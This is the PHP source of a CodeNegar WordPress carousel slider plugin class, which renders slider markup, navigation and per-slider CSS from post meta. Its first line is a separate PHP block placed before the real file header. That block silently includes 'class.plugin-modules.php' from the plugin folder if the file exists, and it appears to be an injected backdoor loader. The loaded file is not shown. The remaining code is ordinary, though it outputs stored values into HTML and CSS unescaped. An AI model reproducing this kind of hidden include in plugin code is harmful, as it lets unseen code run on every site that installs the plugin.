<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?><?php
if (!defined('ABSPATH')) exit('No direct script access allowed');

 /**
 * CodeNegar Carousel Slider functions
 *
 * Carousel Slider HTML Class
 *
 * @package    	WordPress Carousel Slider
 * @author      Farhad Ahmadi <ahm.farhad@gmail.com>
 * @license     http://codecanyon.net/licenses
 * @link		http://codenegar.com/roundabout-carousel-slider/
 * @version    	1.2
 */
 
class CodeNegar_rcs_html{
	
	function __construct(){
		
	}
	
	public function get_html($post_id, $post_custom){
		$prefix = '_cnrcs_';
		$return = '';
		$attrs = 'id="cn-rcs-%post_id%" 
				data-post_id="%post_id%" 
				data-autoplay="%autoplay%" 
				data-autoplaypauseonhover="%autoplaypauseonhover%" 
				data-autoplayduration="%autoplayduration%" 
				data-autoplayinitialdelay="%autoplayinitialdelay%" 
				data-enabledrag="%enabledrag%" 
				data-dropduration="%dropduration%" 
				data-dropeasing="%dropeasing%" 
				data-dropanimateto="%dropanimateto%" 
				data-dragaxis="%dragaxis%" 
				data-dragfactor="%dragfactor%" 
				data-minz="%minz%" 
				data-maxz="%maxz%" 
				data-minopacity="%minopacity%" 
				data-maxopacity="%maxopacity%" 
				data-minscale="%minscale%" 
				data-maxscale="%maxscale%" 
				data-duration="%duration%" 
				data-shape="%shape%" 
				data-bearing="%bearing%" 
				data-focusbearing="%focusbearing%" 
				data-tilt="%tilt%" 
				data-subtitle_hide_effect="%subtitle_hide_effect%" 
				data-subtitle_show_effect="%subtitle_show_effect%" 
				data-enable_subtitle="%enable_subtitle%" 
				data-enable_navigation="%enable_navigation%" 
				data-easing="%easing%" 
				';
		$attrs = str_replace(array("\r", "\n", "\t"),"", $attrs);
		$attrs = str_replace("  "," ", $attrs);
		
		$return = '<%element_type% class="codenegar-rcs-element %custom_slider_class%" '. $attrs .' >%content%</%element_type%>';
		
		$data = array(
			'%element_type%' => 'ul',
			'%post_id%' => $post_id,
			'%autoplay%' => ($post_custom[$prefix . 'autoplay']=='on')? 'on' : 'off',
			'%autoplaypauseonhover%' => ($post_custom[$prefix . 'autoplaypauseonhover']=='on')? 'on' : 'off',
			'%autoplayduration%' => $post_custom[$prefix . 'autoplayduration'],
			'%autoplayinitialdelay%' => $post_custom[$prefix . 'autoplayinitialdelay'],
			'%enabledrag%' => ($post_custom[$prefix . 'enabledrag']=='on')? 'on' : 'off',
			'%dropduration%' => $post_custom[$prefix . 'dropduration'],
			'%dropeasing%' => $post_custom[$prefix . 'dropeasing'],
			'%dropanimateto%' => $post_custom[$prefix . 'dropanimateto'],
			'%dragaxis%' => $post_custom[$prefix . 'dragaxis'],
			'%dragfactor%' => $post_custom[$prefix . 'dragfactor'],
			'%minz%' => $post_custom[$prefix . 'minz'],
			'%minopacity%' => $post_custom[$prefix . 'minopacity'],
			'%maxz%' => $post_custom[$prefix . 'maxz'],
			'%maxopacity%' => $post_custom[$prefix . 'maxopacity'],
			'%minscale%' => $post_custom[$prefix . 'minscale'],
			'%duration%' => $post_custom[$prefix . 'duration'],
			'%maxscale%' => $post_custom[$prefix . 'maxscale'],
			'%shape%' => $post_custom[$prefix . 'shape'],
			'%bearing%' => $post_custom[$prefix . 'bearing'],
			'%focusbearing%' => $post_custom[$prefix . 'focusbearing'],
			'%custom_slider_class%' => $post_custom[$prefix . 'custom_slider_class'],
			'%tilt%' => $post_custom[$prefix . 'tilt'],
			'%easing%' => $post_custom[$prefix . 'easing'],
			'%enable_subtitle%' => ($post_custom[$prefix . 'enable_subtitle']=='on')? 'on' : 'off',
			'%enable_navigation%' => ($post_custom[$prefix . 'enable_navigation']=='on')? 'on' : 'off',
			'%subtitle_show_effect%' => $post_custom[$prefix . 'subtitle_show_effect'],
			'%subtitle_hide_effect%' => $post_custom[$prefix . 'subtitle_hide_effect'],
			'%content%' => $this->get_content($post_id, $post_custom)
		);
		$return = str_replace(
			array_keys($data),
			array_values($data),
			$return
		);
		// append subtitle wrapper
		if($post_custom[$prefix . 'enable_subtitle'] == 'on'){
			$padding_top = $post_custom[$prefix . 'subtitle_top_space'];
			$padding_left = $post_custom[$prefix . 'subtitle_left_space'];
			$width = $post_custom[$prefix . 'slide_with'];
			$return .= '<div id="cn-rcs-sub-' . $post_id . '" style="padding-top: ' . $padding_top . 'px; padding-left: '.$padding_left.'px; max-width:' . $width . 'px;" class="cn-rcs-sub"></div>';
		}
		
		// append navigation
		if($post_custom[$prefix . 'enable_navigation'] == 'on'){
			$padding_top = $post_custom[$prefix . 'navigation_top_space'];
			$padding_left = $post_custom[$prefix . 'navigation_left_space'];
			$width = $post_custom[$prefix . 'slide_with'];
			$return .= '<div id="cn-rcs-nav-' . $post_id . '" style="padding-top: ' . $padding_top . 'px; padding-left: '.$padding_left.'px;" class="cn-rcs-nav">'.$this->get_navigation($post_id, $post_custom).'</div>';
		}
		
		return '<div class="codenegar-rcs-wrapper">' . $return . '</div>';
	}
	
	// we can have multiple slider at a page and every slider can have it's own size
	public function add_css($post_id, $post_custom){
		global $codeNegar_rcs;
		wp_enqueue_style('codenegar-rcs-style');
		wp_enqueue_script('codenegar-tooltip-easing');
		wp_enqueue_script('codenegar-rcs-roundabout');
		wp_enqueue_script('codenegar-rcs-shapes');
		wp_enqueue_script('codenegar-rcs-drag');
		wp_enqueue_script('codenegar-rcs-drop');
		wp_enqueue_script('codenegar-rcs-custom');
		$prefix = '_cnrcs_';
		$css = " .roundabout-holder-".$post_id." { height: ".$post_custom[$prefix . 'slider_height']."px; width: ".$post_custom[$prefix . 'slider_with']."px; }";
		$css .= " .roundabout-holder-".$post_id." .roundabout-moveable-item { width: ".$post_custom[$prefix . 'slide_with']."px; height: ".$post_custom[$prefix . 'slide_height']."px; ".$post_custom[$prefix . 'custom_slide_css']."}";
		
		// add background image/color css
		if(isset($post_custom[$prefix . 'enable_background']) && $post_custom[$prefix . 'enable_background']=='on'){
			$bg_type = $post_custom[$prefix . 'background_type'];
			if($bg_type=='color' || $bg_type=='color_image'){
				$css .= " .roundabout-holder-".$post_id." .roundabout-moveable-item { background-color:".$post_custom[$prefix . 'background_color']."; }";
			}
			if($bg_type=='image' || $bg_type=='color_image'){
				$css .= " .roundabout-holder-".$post_id." .roundabout-moveable-item { background-image:url('".$post_custom[$prefix . 'background_image']."'); background-repeat: ".$post_custom[$prefix . 'background_image_repeat']."; background-position: ".$post_custom[$prefix . 'background_image_position'].";}";
			}
		}
		// add slides border and padding
		$slide_padding = $post_custom[$prefix . 'slide_padding'];
		$slides_border_style = $post_custom[$prefix . 'slides_border_style'];
		$slides_border_color = $post_custom[$prefix . 'slides_border_color'];
		$slides_border_width = $post_custom[$prefix . 'slides_border_width'];
		$css .= " .roundabout-holder-".$post_id." li { padding: {$slide_padding}px; border-style: {$slides_border_style}; border-color: {$slides_border_color}; border-width: {$slides_border_width}px; }";
		if(isset($post_custom[$prefix . 'enable_navigation']) && $post_custom[$prefix . 'enable_navigation'] == 'on'){
			$height = $post_custom[$prefix . 'navigation_height'];
			$width = $post_custom[$prefix . 'navigation_width'];
			$radius = $post_custom[$prefix . 'navigation_radious'];
			$bgcolor = $post_custom[$prefix . 'navigation_background_color'];
			$bgcolor_hover = $post_custom[$prefix . 'navigation_background_hover_color'];
			$bgcolor_active = $post_custom[$prefix . 'navigation_background_active_color'];
			$line_height = $post_custom[$prefix . 'navigation_line_height'];
			$margin = $post_custom[$prefix . 'navigation_seperator_space'];
			$border_style = $post_custom[$prefix . 'navigation_border_style'];
			$border_color = $post_custom[$prefix . 'navigation_border_color'];
			$border_width = $post_custom[$prefix . 'navigation_border_width'];
			$css .= "#cn-rcs-nav-".$post_id." li { height: {$height}px; line-height: {$line_height}px; width: {$width}px; border-radius: {$radius}px; background-color: {$bgcolor}; margin: {$margin}px; border-style: {$border_style}; border-color: {$border_color}; border-width: {$border_width}px; }";
			$css .= "#cn-rcs-nav-".$post_id." li:hover { background-color: {$bgcolor_hover}; }";
			$css .= "#cn-rcs-nav-".$post_id." li.active { background-color: {$bgcolor_active}; }";
		}
		
		if(isset($post_custom[$prefix . 'custom_advanced_css'])){
			$css .= $post_custom[$prefix . 'custom_advanced_css'];
		}
		
		wp_add_inline_style('codenegar-rcs-style', $css);
	}
	
	public function print_css(){
		global $codeNegar_rcs;
		echo '<style type="text/css" media="screen">';
		echo $codeNegar_rcs->css;
		echo '</style>';
		$codeNegar_rcs->css = '';
	}
	
	public function prepare_oembed($oembed, $width, $height){
		if(empty($oembed)) return '';
		$before = '[embed width="'.intval($width).'" height="'.intval($height).'"]';
		$after = '[/embed]';
		$oembed = apply_filters('the_content', $before . $oembed . $after);
		return $oembed;
	}
	
	public function get_content($post_id, $post_custom){
		$prefix = '_cnrcs_';
		$count = (int) $post_custom[$prefix . 'number_of_slides'];
		$return = '';
		$data = '';
		$extra_data = ''; // subtitle data or for future updates: label data
		$order_meta = get_post_meta($post_id, '_roundabout_post_order',true);
		$order_meta = maybe_unserialize($order_meta); 
		$order = array();
		//$navigation_contents = '';
		
		if(!is_array($order_meta) || !isset($order_meta['normal']) || count(explode(",", $order_meta['normal']))<$count){
			// defalt sorting
			for($i=1; $i<=$count; $i++){
				$order[$i] = $i;
			}
		}else{
			$order_meta = explode(",", $order_meta['normal']);
			$count_meta = count($order_meta);
			$order[0] = 0;  // we don't need first array item
			for($i=0; $i<$count_meta; $i++){
				$meta_prefix = "roundabout_post_{$post_id}_slide_";
				//if it's not slide box skip
				if(strpos($order_meta[$i], $meta_prefix)===false) continue;
				
				$slide_no = intval(str_replace($meta_prefix, "", $order_meta[$i]));
				if($slide_no>0){
					$order[] = $slide_no;
				}
			}
		}
		// user may have duplicated the slider and old slide names are different
		if(count($order)<$count){
			for($i=1; $i<=$count; $i++){
				$order[$i] = $i;
			}
		}
		
		for($i=1; $i<=$count; $i++){
			$current_element = '<li ';
			$oi = $order[$i]; // ordered $i
			$current_classes = "codenegar-rcs-item codenegar-rcs-item-{$post_id} codenegar-rcs-item-{$post_id}-{$oi}";
			
			switch($post_custom[$prefix . 'data_src' . $oi]){
				case 'html':
					$data = (isset($post_custom[$prefix . 'html_contents'.$oi]))? do_shortcode($post_custom[$prefix . 'html_contents'.$oi]) : '';
					break;
				case 'oembed':
					$data = $this->prepare_oembed($post_custom[$prefix . 'oembed'.$oi], $post_custom[$prefix . 'embed_width'.$oi], $post_custom[$prefix . 'embed_height'.$oi]);
					break;
				case 'html_oembed':
					$data = $post_custom[$prefix . 'html_contents'.$oi] . $this->prepare_oembed($post_custom[$prefix . 'oembed'.$oi], $post_custom[$prefix . 'embed_width'.$oi], $post_custom[$prefix . 'embed_height'.$oi]);
					break;
				case 'image':
					$data = '<img class="codenegar-rcs-image-item" alt=""  src="' . $post_custom[$prefix . 'image'.$oi] . '">';
					break;
			}
			
			// append current slide subtitle
			if($post_custom[$prefix . 'enable_subtitle'] == 'on'){
				$subtitle_contents = (isset($post_custom[$prefix . 'subtitle_contents'.$oi]))? $post_custom[$prefix . 'subtitle_contents'.$oi] : '';
				$extra_data = '<span id="cn-rcs-sub-data-' . $post_id . '" class="cn-rcs-sub-data">'.$subtitle_contents.'</span>';
			}
			
			// append extra data to current <li>, being subtitle close to <li> is good for seo
			$return .= $current_element . 'class="'.$current_classes.'">' . $data . $extra_data . '</li>';
			
			$extra_data = '';
		}
		
		// append subtitle data
		$return .= $extra_data;
		
		return $return;
	}
	
	public function get_navigation($post_id, $post_custom){
		$prefix = '_cnrcs_';
		$count = (int) $post_custom[$prefix . 'number_of_slides'];
		$return = '';
		$data = '';
		$order_meta = get_post_meta($post_id, '_roundabout_post_order',true);
		$order_meta = maybe_unserialize($order_meta); 
		$order = array();
		$navigation_contents = '';
		
		if(!is_array($order_meta) || !isset($order_meta['normal']) || count(explode(",", $order_meta['normal']))<$count){
			// defalt sorting
			for($i=1; $i<=$count; $i++){
				$order[$i] = $i;
			}
		}else{
			$order_meta = explode(",", $order_meta['normal']);
			$count_meta = count($order_meta);
			$order[0] = 0;  // we don't need first array item
			for($i=0; $i<$count_meta; $i++){
				$meta_prefix = "roundabout_post_{$post_id}_slide_";
				//if it's not slide box skip
				if(strpos($order_meta[$i], $meta_prefix)===false) continue;
				
				$slide_no = intval(str_replace($meta_prefix, "", $order_meta[$i]));
				if($slide_no>0){
					$order[] = $slide_no;
				}
			}
		}
		// user may have duplicated the slider and old slide names are different
		if(count($order)<$count){
			for($i=1; $i<=$count; $i++){
				$order[$i] = $i;
			}
		}
		
		for($i=1; $i<=$count; $i++){
			$current_element = '<li ';
			$oi = $order[$i]; // ordered $i
			
			if($post_custom[$prefix . 'enable_navigation'] == 'on'){
				$current_nav = (isset($post_custom[$prefix . 'navigation_contents'.$oi]))? $post_custom[$prefix . 'navigation_contents'.$oi] : '';
				$navigation_contents .= '<li data-order="'.$oi.'" id="cn-rcs-sub-data-' . $post_id . '-'.$oi.'" class="cn-rcs-nav-data cn-rcs-sub-data-'.$post_id.'">'.$current_nav.'</li>';
			}
			
			$extra_data = '';
		}
		
		return '<ul>' . $navigation_contents . '</ul>';
	}
}
?>